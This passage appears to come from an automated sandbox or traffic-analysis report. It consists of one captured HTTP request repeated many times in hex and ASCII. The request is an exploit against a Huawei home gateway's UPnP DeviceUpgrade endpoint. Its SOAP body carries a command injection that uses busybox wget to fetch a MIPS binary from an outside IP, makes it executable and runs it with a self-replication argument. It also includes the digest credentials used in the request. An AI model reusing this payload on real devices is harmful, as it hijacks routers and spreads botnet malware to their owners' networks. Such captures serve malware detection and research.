3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 